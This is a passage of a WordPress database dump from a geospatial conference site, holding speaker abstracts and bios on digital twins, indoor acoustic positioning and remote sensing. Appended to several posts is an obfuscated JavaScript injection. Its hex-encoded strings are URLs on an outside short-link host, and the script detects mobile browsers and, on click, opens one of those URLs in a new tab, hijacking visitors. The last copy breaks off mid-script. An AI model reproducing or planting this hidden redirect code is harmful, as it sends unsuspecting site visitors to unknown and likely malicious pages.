_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Deren Li, Intelligent Remote Sensing Satellite Based on the Internet','','publish','closed','closed','','intelligent-remote-sensing-satellite-based-on-the-internet','','','2023-08-18 19:29:37','2023-08-18 19:29:37','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4578',0,'dt_team','',0),
(4579,1,'2023-05-27 01:51:10','2023-05-27 01:51:10','','k1','','inherit','open','closed','','k1','','','2023-05-27 01:51:10','2023-05-27 01:51:10','',4578,'https://gsw2023.com/wp-content/uploads/2023/05/k1.jpg',0,'attachment','image/jpeg',0),
(4580,1,'2023-05-27 01:51:16','2023-05-27 01:51:16','','k2','','inherit','open','closed','','k2','','','2023-05-27 01:51:16','2023-05-27 01:51:16','',4578,'https://gsw2023.com/wp-content/uploads/2023/05/k2.jpg',0,'attachment','image/jpeg',0),
(4581,1,'2023-05-27 01:52:24','2023-05-27 01:52:24','','k3','','inherit','open','closed','','k3','','','2023-05-27 01:52:24','2023-05-27 01:52:24','',4578,'https://gsw2023.com/wp-content/uploads/2023/05/k3.jpg',0,'attachment','image/jpeg',0),
(4582,1,'2023-05-27 01:53:58','2023-05-27 01:53:58','<!-- wp:paragraph -->\r\n<p style=\"text-align: left;\"><strong>Embracing the Future: Exploring Digital Twin, IoT, and Artificial Intelligence Innovations for Energy,</strong><br /><strong>Autonomous Vehicles, and Construction Services</strong></p>\r\n<p style=\"text-align: justify;\"><br /><strong>Prof. Dr. Mohamed Elhabiby, Micro Engineering Tech Inc.</strong></p>\r\n<p style=\"text-align: justify;\">Digital twins are virtual replicas of physical assets, systems, or processes, created through 3D reality capture using real-time data from sensors and other sources. They enable simulation, analysis, and optimization of  various aspects of behaviour and performance. In the energy sector, they assist in designing, testing, and optimizing complex systems. In construction, they support maintenance efforts, and their long-term use enables  predictive maintenance through AI and machine learning, optimizing processing time while reducing downtime and costs. The future holds promise with advancements in reality capture sensors, improved accuracy, better  integration with BIM and GIS systems, increased automation, and real-time data processing. AI integration enhances predictive capabilities, leading to autonomous operations, and the expansion of IoT sensors provides  more data for accurate representation. Cloud-based platforms facilitate remote access and collaboration, while virtual and augmented reality advancements offer an immersive understanding of complex systems. Digital  twins are set to revolutionize industries, enabling better decision-making and performance. Case studies from Canada and Egypt will illustrate their applications in construction, road pavement assessment, autonomous vehicles, and energy.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p style=\"text-align: justify;\"><strong>Prof. Dr. Mohamed Elhabiby, Bio</strong></p>\r\n<p style=\"text-align: justify;\">Professor Dr. Mohamed Elhabiby is a highly motivated business professional with extensive industrial experience in research and development (R&amp;amp;D). He is widely recognized for his remarkable contributions to  strategy formulation and implementation, process enhancements, and special projects focused on launching new businesses and establishing exceptional organizations. His leadership style fosters a culture that prioritizes  the well-being of employees, promoting health, safety, and a strong sense of support.<br />As the Co-founder of RoboGarden Inc. and Micro Engineering Tech Inc., based in Calgary, Alberta, and the Co-Founder of Micro Engineering Egypt, located in Cairo, Egypt, Dr. Elhabiby spearheads teams dedicated to  developing cutting-edge technological solutions in the fields of energy, mobility, Smart Cities, and education. His influence extends across Canada and globally. <br />Dr. Elhabiby obtained his Ph.D. in Geomatics Engineering in 2006 and later completed an Executive MBA with a finance specialization at the University of Calgary in 2017. His exceptional work was honoured with the Alberta  Science and Technology Foundation (ASTech) Award in Applied Technology in 2015.<br />Furthermore, Avenue Magazine recognized him as one of the Top 40 under 40 in 2013.<br />Throughout his career, Dr. Elhabiby has held significant positions within esteemed organizations. He is a full Professor at the Faculty of Engineering, Ain Shams University. He served as the Chair of WG 4.1.4:<br />Imaging Techniques, Sub-Commission 4.1 at the International Association of Geodesy. Additionally, he chaired the Geocomputations and Cyber-infrastructure session at the Canadian Geophysical Union annual meeting for  five consecutive years (2008 – 2012) and held the role of Treasurer in the Geodesy Section at the Canadian Geophysical Union for six years (2008-2014). Notably, he led an archaeological mission at the Area of Great  Pyramids in Cairo, Egypt.<br />Dr. Elhabiby has made substantial contributions to academic literature, having published over 150 academic journals, conference presentations, book chapters, workshop proceedings, and technical reports. His expertise  extends to mentoring numerous Ph.D. and MSc. students as well as Post-Doctorate Fellows in both academic and industrial settings.</p>\r\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Mohamed Elhabiby, The Future of Digital Twins and Reality Modelling Technologies in the Energy and Construction Sectors','','publish','closed','closed','','the-future-of-digital-twins-and-reality-modelling-technologies-in-the-energy-and-construction-sectors','','','2023-08-18 19:26:35','2023-08-18 19:26:35','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4582',0,'dt_team','',0),
(4583,1,'2023-05-27 01:54:59','2023-05-27 01:54:59','<!-- wp:paragraph -->\r\n<p><strong>Prof. Ruizhi Chen, the State Key Laboratory of Information Engineering in Surveying, Mapping and Remote Sensing (LIESMARS), Wuhan University</strong></p>\r\n<p>&nbsp;</p>\r\n<p><strong>Presentation title: Positioning Indoors Using Sound</strong></p>\r\n<p style=\"text-align: justify;\"><strong>Abstract</strong><br />Indoor positioning is a core technology enabling artificial intelligence (AI) applications and playing a pivotal role in AI solutions. However, to develop a positioning solution indoors with high accuracy is still challenging,affected by the complexity of the indoor spaces.<br />Currently, various indoor positioning technologies are appealing in the market, such as the Ultra-Wideband (UWB), WiFi-RTT, Bluetooth AoA/AoD, and AR-based localization et.al. This presentation will introduce an indoor positioning technology based on acoustic waves. It utilizes the microphone built-in smartphones as receivers, and offers a ranging accuracy of 0.12 meters and a positioning accuracy of 0.3 meters for all smartphones without changing their hardware. The precise ranging technology has also been implemented in a single chip to support positioning tag development. It has been commercially deployed in airports, railway stations,  convention centers in China.<br />Together with GNSS technology, it offers a seamless indoor/outdoor navigation service.</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: justify;\"><strong>Biography</strong><br />Dr. Ruizhi Chen is a member of the Finnish Academy of Science and Letters. He is currently a Professor at the State Key Laboratory of Information Engineering in Surveying, Mapping and Remote Sensing (LIESMARS) at  Wuhan University, China. He used to be the director of LIESMARS, an Endowed Chair Professor in Texas A&amp;amp;M University Corpus Christ, U.S. and Head &amp;amp; Professor of the Department of Navigation and Positioning at the Finnish Geodetic Institute, Finland. He also worked in Nokia as an Engineering Manager during 1998-2001. Dr. Chen’s research interests include indoor positioning using smartphones and satellite  navigation. He has published two books in English and 156 SCI papers. His research results were selected as cover stories two times in “GPS World”.</p>\r\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 